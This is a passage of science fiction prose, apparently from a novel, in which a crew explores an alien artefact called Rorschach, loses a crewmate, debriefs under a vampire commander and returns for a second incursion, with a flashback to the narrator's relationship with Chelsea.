+Gauges in the head, Szpindel had called them. But there were other things in there too. There was a model of the world, and we didn't look outward at all; our conscious selves saw only the simulation in our heads, an interpretation of reality, endlessly refreshed by input from the senses. What happens when those senses go dark, but the model—thrown off-kilter by some trauma or tumor—fails to refresh? How long do we stare in at that obsolete rendering, recycling and massaging the same old data in a desperate, subconscious act of utterly honest denial? How long before it dawns on us that the world we see no longer reflects the world we inhabit, that we are blind?
+Months sometimes, according to the case files. For one poor woman, a year and more.
+Appeals to logic fail utterly. How could you see the bird when there is no window? How do you decide where your seen half-world ends if you can't see the other half to weigh it against? If you are dead, how can you smell your own corruption? If you do not exist, Amanda, what is talking to us now?
+Useless. When you're in the grip of Cotard's Syndrome or hemineglect you cannot be swayed by argument. When you're in thrall to some alien artefact you know that the self is gone, that reality ends at the midline. You know it with the same unshakeable certainty of any man regarding the location of his own limbs, with that hardwired awareness that needs no other confirmation. Against that conviction, what is reason? What is logic?
+Inside Rorschach, they had no place at all.
+
+*
+
+On the sixth orbit it acted.
+"It's talking to us," James said. Her eyes were wide behind the faceplate, but not bright, not manic. Around us Rorschach's guts oozed and crawled at the corner of my eye; it still took effort to ignore the illusion. Foreign words scrabbled like small animals below my brainstem as I tried to focus on a ring of finger-sized protrusions that picketed a patch of wall.
+"It's not talking," Szpindel said from across the artery. "You're hallucinating again."
+Bates said nothing. Two grunts hovered in the middle of the space, panning across three axes.
+"It's different this time," James insisted. "The geometry—it's not so symmetrical. Looks almost like the Phaistos disk." She spun slowly, pointed down the passage: "I think it's stronger down here…"
+"Bring Michelle out," Szpindel suggested. "Maybe she can talk some sense into you."
+James laughed weakly. "Never say die, do you?" She tweaked her pistol and coasted into deeper gloom. "Yes, it's definitely stronger here. There's content, superimposed on—"
+Quick as a blink, Rorschach cut her off.
+I'd never seen anything move so fast before. There was none of the languor we'd grown accustomed to from Rorschach's septa, no lazy drift to contraction; the iris snapped shut in an instant. Suddenly the artery just ended three meters ahead, with a matte-black membrane filigreed in fine spiral.
+And the Gang of Four was on the other side.
+The grunts were on it immediately, lasers crackling through the air. Bates was yelling Get behind me! Stick to the walls!, kicking herself into space like an acrobat in fast-forward, taking some tactical high ground that must have been obvious to her, at least. I edged towards the perimeter. Threads of superheated plasma sliced the air, shimmering. Szpindel, at the corner of my eye, hugged the opposite side of the tunnel. The walls crawled. I could see the lasers taking a toll; the septum peeled back from their touch like burning paper, black oily smoke writhing from its crisping edges and—
+Sudden brightness, everywhere. A riot of fractured light flooded the artery, a thousand shifting angles of incidence and reflection. It was like being trapped in the belly of a kaleidoscope, pointed at the sun. Light—
+—and needle-sharp pain in my side, in my left arm. The smell of charred meat. A scream, cut off.
+Susan? You there, Susan?
+We're taking you first.
+Around me, the light died; inside me, a swarm of floaters mixed it up with the chronic half-visions Rorschach had already planted in my head. Alarms chirped irritatingly in my helmet— breach, breach, breach—until the smart fabric of the suit softened and congealed where the holes had been. Something stung maddeningly in my left side. I felt as if I'd been branded.
+"Keeton! Check Szpindel!" Bates had called off the lasers. The grunts closed for hand-to-hand, reaching with fiery nozzles and diamond-tipped claws to grapple with some prismatic material glowing softly behind that burnt-back skin.
+Fibrous reflector, I realized. It had shattered the laser light, turned it to luminous shrapnel and thrown it back in our faces. Clever.
+But its surface was still alight, even with the lasers down; a diffuse glow, dipping and weaving, filtered through from the far side of the barrier while the drones chewed doggedly through the near one. After a moment it struck me: James's headlamp.
+"Keeton!"
+Right. Szpindel.
+His faceplate was intact. The laser had melted the Faraday mesh laminated onto the crystal, but the suit was sealing that tiny hole even now. The hole behind, drilled neatly through his forehead, remained. The eyes beneath stared at infinity.
+"Well?" Bates asked. She could read his vitals as easily as I, but Theseus was capable of post-mortem rebuilds.
+Barring brain damage. "No."
+The whine of drills and shredders stopped; the ambience brightened. I looked away from Szpindel's remains. The grunts had cut a hole in the septum's fibrous underlayer. One of them nosed its way through to the other side.
+A new sound rose into the mix, a soft animal keening, haunted and dissonant. For a moment I thought Rorschach was whispering to us again; its walls seemed to contract slightly around me.
+"James?" Bates snapped. "James!"
+Not James. A little girl in a woman's body in an armored spacesuit, scared out of her wits.
+The grunt nudged her curled-up body back into our company. Bates took it gently. "Susan? Come back, Suze. You're safe."
+The grunts hovered restlessly, alert in every direction, pretending everything was under control. Bates spared me a glance—"Take Isaac."—and turned back to James. "Susan?"
+"N—n-no," whimpered a small voice, a little girl's voice.
+"Michelle? Is that you?"
+"There was a thing," the little girl said. "It grabbed me. It grabbed my leg."
+"We're out of here." Bates pulled the Gang back along the passage. One grunt lingered, watching the hole; the other took point.
+"It's gone," Bates said gently. "There's nothing there now. See the feed?"
+"You can't s-see it." Michelle whispered. "It's in—it's in—visible.."
+The septum receded around a curve as we retreated. The hole torn through its center watched us like the ragged pupil of some great unblinking eye. It stayed empty as long as it stayed in sight. Nothing came out after us. Nothing we could see. A thought began cycling through my head, some half-assed eulogy stolen from an eavesdropped confessional, and try as I might I couldn't shut it down.
+Isaac Szpindel hadn't made the semifinals after all.
+
+*
+
+Susan James came back to us on the way up. Isaac Szpindel did not.
+We stripped wordlessly in the decon balloon. Bates, first out of her suit, reached for Szpindel but the Gang stopped her with a hand and a headshake. Personae segued one into another as they stripped the body. Susan removed helmet and backpack and breastplate. Cruncher peeled away the silvery leaded skin from collar to toe. Sascha stripped the jumpsuit and left the pale flesh naked and exposed. Except for the gloves. They left his feedback gloves in place; their fingertips forever tactile, the flesh inside forever numb. Through it all, Szpindel stared unblinking beneath the hole in his forehead. His glazed eyes focused on distant quasars.
+I expected Michelle to appear in her turn and close them, but she never did.
+
+"You have eyes, but you do not see"
+—Jesus the Nazorean
+
+I don't know how to feel about this, I thought. He was a good man. He was decent, he was kind to me, even when he didn't know I was listening in. I didn't know him long— he wasn't a friend exactly— but still. I should miss him. I should mourn.
+I should feel more than this sick sinking fear that I could be next...
+Sarasti hadn't wasted any time. Szpindel's replacement met us as we emerged, freshly thawed, nicotine-scented. The rehydration of his flesh was ongoing— saline bladders clung to each thigh—although it would never entirely erase the sharpness of his features. His bones cracked when he moved.
+He looked past me and took the body. "Susan—Michelle...I—"
+The gang turned away.
+He coughed, began fumbling a body condom over the corpse. "Sarasti wants everyone in the drum."
+"We're hot," Bates said. Even cut short, the excursion had piled up a lethal Seivert count. Faint nausea tickled the back of my throat.
+"Decontaminate later." One long pull of a zipper and Szpindel was gone, engulfed in an oily gray shroud. "You—" he turned in my direction, pointed at the scorched holes in my jumpsuit. "With me."
+Robert Cunningham. Another prototype. Dark-haired, hollow-cheeked, a jaw you could use as a ruler. Both smoother and harsher than the man he had replaced. Where Szpindel had ticced and jerked as if static-charged, Cunningham's face held all the expression of a wax dummy's. The wetware that ran those muscles had been press-ganged into other pursuits. Even the tremors that afflicted the rest of his body were muted, soothed by the nicotine he drew with every second breath.
+He held no cigarette now. He held only the shrouded body of his hard-luck primary and his ongoing, freshly thawed distaste for the ship's synthesist. His fingers trembled.
+Bates and the Gang moved silently up the spine. Cunningham and I followed, guiding the Shroud of Szpindel between us. My leg and side were stinging again, now that Cunningham had reminded them to. There wouldn't be much he could do about them, though. The beams would have cauterized the flesh on their way through, and if they'd hit anything vital I'd have been dead already.
+At the hatch we broke into single-file: Szpindel first, Cunningham pushing at his heels. By the time I emerged into the drum Bates and the gang were already down on deck and taking their usual seats. Sarasti, in the flesh, watched them from the end of the conference table.
+His eyes were naked. From this angle the soft, full-spectrum light of the drum washed the shine from them. If you didn't look too closely, for too long, you might almost think those eyes were Human.
+BioMed had been spun down for my arrival. Cunningham pointed to a diagnostic couch on a section of the stilled deck that served as our infirmary; I floated over and strapped myself in. Two meters away, past a waist-high guard rail that had risen from the deck, the rest of the drum rolled smoothly past. It slung Bates and the Gang and Sarasti around like weights on a string.
+I tapped ConSensus to hear them. James was speaking, quietly and without expression. "I noticed a new pattern in the form-constants. Something in the grating. It looked like a signal. It got stronger as I went down the tunnel, I followed it, I blacked out. I don't remember anything more until we were on our way back. Michelle filled me in, as much as she could. That's all I know. I'm sorry."
+A hundred degrees away in the no-gee zone, Cunningham maneuvered his predecessor into a coffin with different options than those up front. I wondered if it would embark on an autopsy during the debriefing. I wondered if we'd be able to hear the sounds it made.
+"Sascha," Sarasti said.
+"Yeah." Sascha's trademark drawl infected the voice. "I was riding Mom. Went deaf dumb and stark fucking blind when she passed out. I tried to take over but something was blocking me. Michelle, I guess. Never thought she had it in her. I couldn't even see."
+"But you don't lose consciousness."
+"I was awake the whole time, far as I know. Just completely in the dark."
+"Smell? Tactile?"
+"I could feel it when Michelle pissed in the suit. But I didn't notice anything else."
+Cunningham was back at my side. The inevitable cigarette had appeared between his lips.
+"Nothing touches you," the vampire surmised. "Nothing grabs your leg."
+"No," Sascha said. She didn't believe Michelle's stories about invisible monsters. None of us did; why bother, when dementia could so easily explain anything we experienced?
+"Cruncher."
+"Don't know anything," I still wasn't used to the maleness of the voice now emanating from James's throat. Cruncher was a workaholic. He hardly ever surfaced in mixed company.
+"You're there," Sarasti reminded him. "You must remember some—"
+"Mom sent me patterns to parse. I was working on them. I'm still working on them," he added pointedly. "I didn't notice anything. Is that all?"
+I'd never been able to get a good read on him. Sometimes Cruncher seemed to have more in common with the dozens of nonconscious modules working in James's head than with sentient hubs comprising the rest of the Gang. "You feel nothing?" Sarasti pressed.
+"Just the patterns."
+"Anything significant?"
+"Standard phenomath spirals and gratings. But I haven't finished. Can I go now?"
+"Yes. Call Michelle, please."
+Cunningham stabbed at my wounds with anabolisers, muttering to himself. Faint blue smoke curled between us. "Isaac found some tumors," he observed.
+I nodded and coughed. My throat was sore. The nausea had grown heavy enough to sink below my diaphragm.
+"Michelle." Sarasti repeated.
+"I see some more here," Cunningham continued. "Along the bottom of your brain pan. Only a few dozen cells so far, they're not worth burning yet."
+"Here." Michelle's voice was barely audible, even through ConSensus, but at least it was the voice of an adult. "I'm here."
+"What do you remember, please?"
+"I—I felt—I was just riding Mom, and then she was gone and there was no one else, so I had to—take over…"
+"Do you see the septum close?"
+"Not really. I felt it going dark, but when I turned around we were already trapped. And then I felt something behind me, it wasn't loud or harsh it just sort of bumped, and it grabbed me, and—and—
+"I'm sorry," she said after a moment. "I'm a bit—woozy..."
+Sarasti waited.
+"Isaac," Michelle whispered. "He..."
+"Yes." A pause. "We're very sorry about that."
+"Maybe—can he be fixed?"
+"No. There's brain damage." There was something like sympathy in the vampire's voice, the practiced affectation of an accomplished mimic. There was something else, too, an all-but-imperceptible hunger, a subtle edge of temptation. I don't think anyone heard it but me.
+We were sick, and getting sicker. Predators are drawn to the weak and injured.
+Michelle had fallen silent again. When she continued, her voice only faltered a little: "I can't tell you much. It grabbed me. It let me go. I went to pieces, and I can't explain why except that fucking place just does things to you, and I was—weak. I'm sorry. There's not much else to tell you."
+"Thank you," Sarasti said after a long moment.
+"Can I—I'd like to leave if that's okay."
+"Yes," Sarasti said. Michelle sank below the surface as the Commons rotated past. I didn't see who took her place.
+"The grunts didn't see anything," Bates remarked. "By the time we broke through the septum the tunnel behind was empty."
+"Any bogey would have had plenty of time to hightail," Cunningham said. He planted his feet on the deck and grabbed a handhold; the subdrum began to move. I drifted obliquely against my restraints.
+"I don't disagree," Bates said, "But if there's anything we've learned about that place, it's that we can't trust our senses."
+"Trust Michelle's," Sarasti said. He opened a window as I grew heavier: a grunt's-eye view of a fuzzy, bright blob weaving behind the translucent waxed-paper fibers of the skinned septum. James's headlight, from the wrong side of the barrier. The image wobbled a bit as the drone staggered through some local pocket of magnetism, then replayed. Wobbled, replayed. A six-second loop.
+"See something next to the Gang."
+Non-vampires saw no such thing. Sarasti froze the image, evidently realizing as much. "Diffraction patterns aren't consistent with a single light source in open space. I see dimmer elements, reflective elements. Two dark objects close together, similar size, scattering light here—" a cursor appeared at two utterly nondescript points on the image— "and here. One's the Gang. The other's unaccounted for."
+"Just a minute," Cunningham said. "If you can see it through all that, why didn't Su—why didn't Michelle see anything?"
+"Synesthesiac," Sarasti reminded him. "You see. She feels."
+BioMed jerked slightly, locking into spin-synch with the drum; the guard rail sank back into the deck. Off in some far-off corner, something without eyes watched me watching it.
+"Shit," Bates whispered. "There's someone home."
+
+*
+
+They never really talked like that, by the way. You'd hear gibberish—a half-dozen languages, a whole Babel of personal idioms—if I spoke in their real voices.
+Some of the simpler tics make it through: Sascha's good-natured belligerence, Sarasti's aversion to the past tense. Cunningham lost most of his gender pronouns to an unforeseen glitch during the work on his temporal lobe. But it went beyond that. The whole lot of them threw English and Hindi and Hadzane into every second sentence; no real scientist would allow their thoughts to be hamstrung by the conceptual limitations of a single language. Other times they acted almost as synthesists in their own right, conversing in grunts and gestures that would be meaningless to any baseline. It's not so much that the bleeding edge lacks social skills; it's just that once you get past a certain point, formal speech is too damn slow.
+Except for Susan James. The walking contradiction, the woman so devoted to Communication As Unifier that she'd cut her own brain into disunified chunks to make the point. She was the only one who ever seemed to care who she was talking to. The others spoke only for themselves, even when they spoke to each other. Even James's other cores would speak their own minds in their own way, and let everyone else translate as best they could. It wasn't a problem. Everyone on Theseus could read everyone else.
+But that didn't matter to Susan James. She fit each of her words to their intended recipient, she accommodated.
+I am a conduit. I exist to bridge the gap, and I'd bridge nothing if I only told you what these people said. So I am telling you what they meant, and it will mean as much to you as you can handle.
+Except for Susan James, linguist and Ringleader, whom I trust to speak for herself.
+
+*
+
+Fifteen minutes to apogee: maximum safe distance, in case Rorschach decided to hit back. Far below, the artefact's magnetic field pressed into Ben's atmosphere like God's little finger. Great dark thunderheads converged behind it; turbulent moon-sized curlicues collided in its wake.
+Fifteen minutes to apogee, and Bates was still hoping Sarasti would change his mind.
+In a way, this was her fault. If she had just treated this new travail as one more cross to bear, perhaps things would have gone on more or less as before. There would have been some faint hope that Sarasti would have let us grit our teeth and keep on going, besieged now by spring-loaded trapdoors as well as the usual gauntlet of Seiverts and magnets and monsters from the id. But Bates had made an issue out of it. It wasn't just another piece of shit in the sewer to her: it was the one that clogged the pipe.
+We're on the brink as it is, just surviving the baseline environment of this thing. If it's started taking deliberate countermeasures…I don't see how we can risk it.
+Fourteen minutes to apogee, and Amanda Bates was still regretting those words.
+On previous expeditions we'd charted twenty-six septa in various stages of development. We'd x-rayed them. We'd done ultrasound. We'd watched them ooze their way across passages or ebb slowly back into the walls. The iris that had snapped shut behind the Gang of Four had been a whole different animal.
+And what are the odds that the first one with a hair-trigger just happened to also come with antilaser prismatics? That was no routine growth event. That thing was set for us.
+Set by…
+That was the other thing. Thirteen minutes to apogee, and Bates was worried about the tenants.
+It had always been breaking and entering, of course. That much hadn't changed. But when we'd jimmied the lock we'd thought we were vandalizing an empty summer cottage, still under construction. We'd thought the owners would be out of the picture for a while. We hadn't been expecting one of them to catch us on his way to take a late-night piss. And now that one had, and vanished into the labyrinth, it was natural to wonder what weapons it might keep stashed under the pillow…
+Those septa could spring on us any time. How many are there? Are they fixed, or portable? We can't proceed without knowing these things..
+At first, Bates had been surprised and delighted when Sarasti agreed with her.
+Twelve minutes to apogee. From this high ground, well above the static, Theseus peered down through Rorschach's wrenched and twisted anatomy to keep rock-steady eyes on the tiny wound we'd burned in its side. Our limpet tent covered it like a blister; inside, Jack fed us a second, first-person view of the unfolding experiment.
+Sir. We know Rorschach is inhabited. Do we want to risk further provoking the inhabitants? Do we want to risk killing them?
+Sarasti hadn't quite looked at her, and hadn't quite spoken. If he had, he might have said I do not understand how meat like you survived to adulthood.
+Eleven minutes to apogee, and Amanda Bates was lamenting the fact—not for the first time— that this mission was not under military jurisdiction.
+We were waiting for maximum distance before performing the experiment. Rorschach might interpret this as a hostile act, Sarasti had conceded in a voice that contained no trace of irony whatsoever. Now he stood before us, watching ConSensus play on the table. Reflections writhed across his naked eyes, not quite masking the deeper reflections behind them.
+Ten minutes to apogee. Susan James was wishing that Cunningham would put out that goddamned cigarrette. The smoke stank on its way to the ventilators, and anyway, it wasn't necessary. It was just an anachronistic affectation, an attention-getting device; if he needed the nicotine a patch could have soothed his tremors just as easily, without the smoke and the stink.
+That wasn't all she was thinking, though. She was wondering why Cunningham had been summoned to Sarasti's quarters earlier in the shift, why he'd looked at her so strangely afterward. I wondered about that myself. A quick check on ConSensus timestamps showed that her medical file had been accessed during that period. I checked those stats, let the shapes bounce between hemispheres: part of my brain locked on elevated oxytocin as the probable reason for that conference. There was an eighty-two percent chance that James had become too trusting for Sarasti's liking.
+I had no idea how I knew that. I never did.
+Nine minutes to apogee.
+Barely a molecule of Rorschach's atmosphere had been lost on our account. That was all about to change. Our view of base camp split like a dividing bacterium: one window now focused on the limpet tent, the other on a wide-angle tactical enhance of the space around it.
+Eight minutes to apogee. Sarasti pulled the plug.
+Down on Rorschach, our tent burst like a bug beneath a boot. A geyser erupted from the wound; a snowstorm swirled at its edges, its charged curlicues intricate as lace. Atmosphere gushed into vacuum, spread thin, crystallized. Briefly, the space around base camp sparkled. It was almost beautiful.
+Bates didn't think it was beautiful at all. She watched that bleeding wound with a face as expressionless as Cunningham's, but her jaw was clenched unto tetanus. Her eyes darted between views: watching for things gasping in the shadows.
+Rorschach convulsed.
+Vast trunks and arteries shuddered, a seismic tremor radiating out along the structure. The epicenter began to twist, a vast segment rotating on its axis, the breach midway along its length. Stress lines appeared where the length that rotated sheared against the lengths to either side that didn't; the structure seemed to soften and stretch there, constricting like a great elongate balloon torqueing itself into sausage links.
+Sarasti clicked. Cats made something like that sound when they spied a bird on the far side of a windowpane.
+ConSensus groaned with the sound of worlds scraping against each other: telemetry from the onsite sensors, their ears to the ground. Jack's camera controls had frozen again. The image it sent was canted and grainy. The pickup stared blankly at the edge of the hole we'd bored into the underworld.
+The groaning subsided. A final faint cloud of crystalline stardust dissipated into space, barely visible even on max enhance.
+No bodies. None visible, anyway.
+Sudden motion at base camp. At first I thought it was static on Jack's feed, playing along lines of high contrast—but no, something was definitely moving along the edges of the hole we'd burned. Something almost wriggled there, a thousand gray mycelia extruding from the cut surface and writhing slowly into the darkness. "It's—huh," Bates said. "Triggered by the pressure drop, I guess. That's one way to seal a breach."
+Two weeks after we'd wounded it, Rorschach had begun to heal itself.
+Apogee behind us now. All downhill from here. Theseus began the long drop back into enemy territory.
+"Doesn't use septa," Sarasti said.
+"My genes done gone and tricked my brain
+By making fucking feel so great
+That's how the little creeps attain
+Their plan to fuckin' replicate
+But brain's got tricks itself, you see
+To get the bang but not the bite
+I got this here vasectomy
+My genes can fuck themselves tonight."
+
+—The r-selectors, Trunclade
+
+First-person sex—real sex, as Chelsea insisted on calling it—was an acquired taste: jagged breathing, the raw slap and stink of sweaty skin full of pores and blemishes, a whole other person with a whole other set of demands and dislikes. There was definite animal appeal, no doubt about it. This was, after all, how we'd done it for millions of years. But this, this third-world carnality had always carried an element of struggle, of asynchronous patterns in conflict. There was no convergence here. There was only the rhythm of bodies in collision, a struggle for dominance, each trying to force the other into synch.
+Chelsea regarded it as love in its purest form. I came to think of it as hand-to-hand combat. Before, whether fucking creations from my own menu or slip-on skins from someone else's, I had always selected the contrast and the rez, the texture and the attitude. The bodily functions, the resistance of competing desires, the endless foreplay that wears your tongue to the root and leaves your face sticky and glistening—just kinks, today. Options for the masochistic.
+But there were no options with Chelsea. With her, everything came standard.
+I indulged her. I guess I was no more patient with her perversions than she was with my ineptitude at them. Other things made it worth the effort. Chelsea would argue about anything under the sun, wry and insightful and curious as a cat. She would pounce without warning. Retired to the redundant majority, she still took such simple joy in the very act of being alive. She was impulsive and impetuous. She cared about people. Pag. Me. She wanted to know me. She wanted in.
+That was proving to be a problem.
+"We could try it again," she said once in an aftermath of sweat and pheromones. "And you won't even remember what you were so upset about. You won't even remember you were upset, if you don't want to."
+I smiled and looked away; suddenly the planes of her face were coarse and unappealing. "How many times is that now? Eight? Nine?"
+"I just want you to be happy, Cyg. True happiness is one hell of a gift, and I can give it to you if you'll let me."
+"You don't want me happy," I said pleasantly. "You want me customized."
+She mmm'd into the hollow of my throat for a moment. Then: "What?"
+"You just want to change me into something more, more accommodating."
+Chelsea lifted her head. "Look at me."
+I turned my head. She'd shut down the chromatophores in her cheek; the tattoo, transplanted, fluttered now on her shoulder.
+"Look at my eyes," Chelsea said.
+I looked at the imperfect skin around them, at the capillaries wriggling across the whites. I felt a distant bemusement that such flawed, decaying organs were still able to hypnotize me on occasion.
+"Now," Chelsea said. "What do you mean by that?"
+I shrugged. "You keep pretending this is a partnership. We both know it's a competition."
+"A competition."
+"You're trying to manipulate me into playing by your rules."
+"What rules?"
+"The way you want the relationship run. I don't blame you, Chelse, not in the least. We've been trying to manipulate each other for as long as—hell, it's not even Human nature. It's mammalian."
+"I don't believe it." She shook her head. Ropy tendrils of hair swung across her face. "It's the middle of the twenty-first Century and you're hitting me with this war of the sexes bullshit?"
+"Granted, your tweaks are a pretty radical iteration. Get right in there and reprogram your mate for optimum servility."
+"You actually think I'm trying to, to housebreak you? You think I'm trying to train you like a puppy?"
+"You're just doing what comes naturally."
+"I can't believe you'd pull this shit on me."
+"I thought you valued honesty in relationships."
+"What relationship? According to you there's no such thing. This is just—mutual rape, or something."
+"That's what relationships are."
+"Don't pull that shit on me." She sat up, swung her feet over the edge of the bed. Putting her back to me. "I know how I feel. If I know anything I know that much. And I only wanted to make you happy."
+"I know you believe that," I said gently. "I know it doesn't feel like a strategy. Nothing does when it's wired that deeply. It just feels right, it feels natural. It's nature's trick."
+"It's someone's fucking trick."
+I sat up next to her, let my shoulder brush hers. She leaned away.
+"I know this stuff," I said after a while. "I know how people work. It's my job."
+It was hers too, for that matter. Nobody who spliced brains for a living could possibly be unaware of all that basic wiring in the sub-basement. Chelsea had simply chosen to ignore it; to have admitted anything would have compromised her righteous anger.
+I could have pointed that out too, I suppose, but I knew how much stress the system could take and I wasn't ready to test it to destruction. I didn't want to lose her. I didn't want to lose that feeling of safety, that sense that it made a difference whether I lived or died. I only wanted her to back off a bit. I only wanted room to breathe.
+"You can be such a reptile sometimes," she said.
+Mission accomplished.
+
+*
+
+Our first approach had been all caution and safety margins. This time we came in like a strike force.
+Scylla burned towards Rorschach at over two gees, its trajectory a smooth and predictable arc ending at the ruptured base camp. It may have even landed there, for all I know; perhaps Sarasti had two-birded the mission, programmed the shuttle for some collecting of its own. If so, it wouldn't land with us on board. Scylla spat us into space almost fifty kilometers short of the new beachhead, left us naked and plummeting on some wireframe contraption with barely enough reaction mass for a soft landing and a quick getaway. We didn't even have control over that: success depended on unpredictability, and how better to ensure that than to not even know ourselves what we were doing?
+Sarasti's logic. Vampire logic. We could follow it partway: the colossal deformation that had sealed Rorschach's breach was so much slower, so much more expensive than the dropgate that had trapped the Gang. The fact that dropgates hadn't been used implied that they took time to deploy—to redistribute necessary mass, perhaps, or spring-load its reflexes. That gave us a window. We could still venture into the den so long as the lions couldn't predict our destination and set traps in advance. So long as we got out again before they could set them afterwards.
+"Thirty-seven minutes," Sarasti had said, and none of us could fathom how he'd come to that number. Only Bates had dared to ask aloud, and he had merely glinted at her: "You can't follow."
+Vampire logic. From an obvious premise to an opaque conclusion. Our lives depended on it.
+The retros followed some preprogrammed algorithm that mated Newton with a roll of the dice. Our vector wasn't completely random—once we'd eliminated raceways and growth zones, areas without line-of-sight escape routes, dead ends and unbranched segments ("Boring," Sarasti said, dismissing them), barely ten percent of the artefact remained in the running. Now we dropped towards a warren of brambles eight kilometers from our original landing site. Here in the midst of our final approach, there was no way that even we could predict our precise point of impact.
+If Rorschach could, it deserved to win.
+We fell. Ridged spires and gnarled limbs sectioned the sky wherever I looked, cut the distant starscape and the imminent superJovian into a jagged mosaic veined in black. Three kilometers away or thirty, the tip of some swollen extremity burst in a silent explosion of charged particles, a distant fog of ruptured, freezing atmosphere. Even as it faded I could make out wisps and streamers swirling into complex spirals: Rorschach's magnetic field, sculpting the artefact's very breath into radioactive sleet.
+I'd never seen it with naked eyes before. I felt like an insect on a starry midwinter's night, falling through the aftermath of a forest fire.
+The sled fired its brakes. I snapped back against the webbing of my harness, bumped against the rebounding armored body next to me. Sascha. Only Sascha, I remembered. Cunningham had sedated the rest of them, left this one core lonely and alone in the group body. I hadn't even realized that that was possible with multiple personalities. She stared back at me from behind her faceplate. None of her surfaces showed through the suit. I could see nothing in her eyes.
+That was happening so often, these days.
+Cunningham was not with us. Nobody had asked why, when Sarasti assigned the berths. The biologist was first among equals now, a backup restored with no other behind him. The second-least replaceable of our irreplaceable crew.
+It made me a better bargain. The odds I bought had increased to one in three.
+A silent bump shuddered up the frame. I looked forward again, past Bates on the front pallet, past the anchored drones that flanked her two to each side. The sled had launched its assault, a prefab inflatable vestibule mounted on an explosive injection assembly that would punch through Rorschach's skin like a virus penetrating a host cell. The spindle-legged contraption dwindled and disappeared from my sight. Moments later a pinpoint sodium sun flared and died against the ebony landscape ahead—antimatter charge, so small you could almost count the atoms, shot directly into the hull. A lot rougher than the tentative foreplay of our first date.
+We landed, hard, while the vestibule was still inflating. The grunts were off the sled an instant before contact, spitting tiny puffs of gas from their nozzles, arranging themselves around us in a protective rosette. Bates was up next, leaping free of her restraints and sailing directly towards the swelling hab. Sascha and I unloaded the fiberop hub—a clamshell drum half a meter thick and three times as wide—lugging it between us while one of the grunts slipped through the vestibule's membranous airlock.
+"Let's move, people." Bates was hanging off one of the inflatable's handholds. "Thirty minutes to—"
+She fell silent. I didn't have to ask why: the advance grunt had positioned itself over the newly-blasted entrance and sent back its first postcard.
+Light from below.
+
+*
+
+You'd think that would have made it easier. Our kind has always feared the dark; for millions of years we huddled in caves and burrows while unseen things snuffled and growled—or just waited, silent and undetectable—in the night beyond. You'd think that any light, no matter how meager, might strip away some of the shadows, leave fewer holes for the mind to fill with worst imaginings.
+You'd think.
+We followed the grunt down into a dim soupy glow like blood-curdled milk. At first it seemed as though the atmosphere itself was alight, a luminous fog that obscured anything more than ten meters distant. An illusion, as it turned out; the tunnel we emerged into was about three meters wide and lit by rows of raised glowing dashes—the size and approximate shape of dismembered human fingers—wound in a loose triple helix around the walls. We'd recorded similar ridges at the first site, although the breaks had not been so pronounced and the ridges had been anything but luminous.
+"Stronger in the near-infrared," Bates reported, flashing the spectrum to our HUDs. The air would have been transparent to pit vipers. It was transparent to sonar: the lead grunt sprayed the fog with click trains and discovered that the tunnel widened into some kind of chamber seventeen meters further along. Squinting in that direction I could just make out subterranean outlines through the mist. I could just make out jawed things, pulling back out of sight.
+"Let's go," Bates said.
+We plugged in the grunts, left one guarding the way out. Each of us took another as a guardian angel on point. The machines spoke to our HUDs via laser link; they spoke to each other along stiffened lengths of shielded fiberop that unspooled from the hub trailing in our wake. It was the best available compromise in an environment without any optima. Our tethered bodyguards would keep us all in touch during lone excursions around corners or down dead ends.
+Yeah. Lone excursions. Forced to either split the group or cover less ground, we were to split the group. We were speed-cartographers panning for gold. Everything we did here was an act of faith: faith that the unifying principles of Rorschach's internal architecture could be derived from the raw dimensions we'd grab on the run. Faith that Rorschach's internal architecture even had unifying principles. Earlier generations had worshipped malign and capricious spirits. Ours put its faith in an ordered universe. Here in the Devil's Baklava, it was easy to wonder if our ancestors hadn't been closer to the mark.
+We moved along the tunnel. Our destination resolved to merely human eyes: not so much chamber as nexus, a knot of space formed by the convergence of a dozen tunnels angling in from different orientations. Ragged meshes of quicksilver dots gleamed along several glistening surfaces; shiny protrusions poked through the substrate like a scattershot blast of ball-bearings pressed into wet clay.
+I looked at Bates and Sascha. "Control panel?"
+Bates shrugged. Her drones panned the throats around us, spraying sonar down each. My HUD sketched a patchy three-d model from the echoes: swathes of paint thrown against invisible walls. We were dots near the center of a ganglion, a tiny swarm of parasites infesting some great hollowed host. Each tunnel curved away in a gradual spiral, each along a different orientation. Sonar could peep around those bends a few meters further than we could. Neither eyes nor ultrasonics saw anything to distinguish one choice from another.
+Bates pointed down one of the passageways—"Keeton—" and another— "Sascha," before turning to coast off down her own unbeaten path.
+I looked uneasily down mine. "Any particular—"
+"Twenty-five minutes," she said.
+I turned and jetted slowly down my assigned passageway. The passage curved clockwise, a long unremarkable spiral; after twenty meters that curvature would have blocked any view of its entrance even if the foggy atmosphere hadn't. My drone kept point across the tunnel, its sonar clicking like the chattering of a thousand tiny teeth, its tether unspooling back to the distant drum in the nexus.
+It was a comfort, that leash. It was short. The grunts could stray ninety meters and no further, and we were under strict orders to stay under their wings at all times. This dim infested burrow might lead all the way to hell, but I would not be expected to follow it nearly so far. My cowardice had official sanction.
+Fifty meters to go. Fifty meters and I could turn and run with my tail between my legs. In the meantime all I had to do was grit my teeth, and focus, and record: everything you see, Sarasti had said. As much as possible of what you can't. And hope that this new reduced time limit would expire before Rorschach spiked us into gibbering dementia.
+The walls around me twitched and shivered like the flesh of something just-killed. Something darted in and out of sight with a faint cackle of laughter.
+Focus. Record. If the grunt doesn't see it, it's not real.
+Sixty-five meters in, one of the ghosts got inside my helmet.
+I tried to ignore it. I tried to look away. But this phantom wasn't flickering at the edge of vision; it hovered near the center of my faceplate, floating like a spot of swirling dizziness between me and the HUD. I gritted my teeth and tried to look past, stared into the dim bloody haze of the middle distance, watched the jerky unfolding travelogues in the little windows labeled Bates and James. Nothing out there. But in here, floating before my eyes, Rorschach's latest headfuck smeared a fuzzy thumbprint right in front of the sonar feed.
+"New symptom," I called in. "Nonperipheral hallucination, stable, pretty formless though. No spiking that I can—"
+The inset marked Bates skidded hard about. "Keet—"
+Window and voice cut out together.
+Not just Bates' window, either. Sascha's inset and the drone's-eye sonarscape flickered and died at the same moment, stripped my HUD bare except for in-suit feeds and a little red readout flashing Link Down. I spun but the grunt was still there, three meters off my right shoulder. Its optical port was clearly visible, a ruby thumbnail set into the plastron.
+Its gun ports were visible too. Pointing at me.
+I froze. The drone shivered in some local electromagnetic knot as if terrified. Of me, or—
+Of something behind me…
+I started to turn. My helmet filled with sudden static, and with what sounded—faintly—like a voice:
+"—ucking move, Kee—not—"
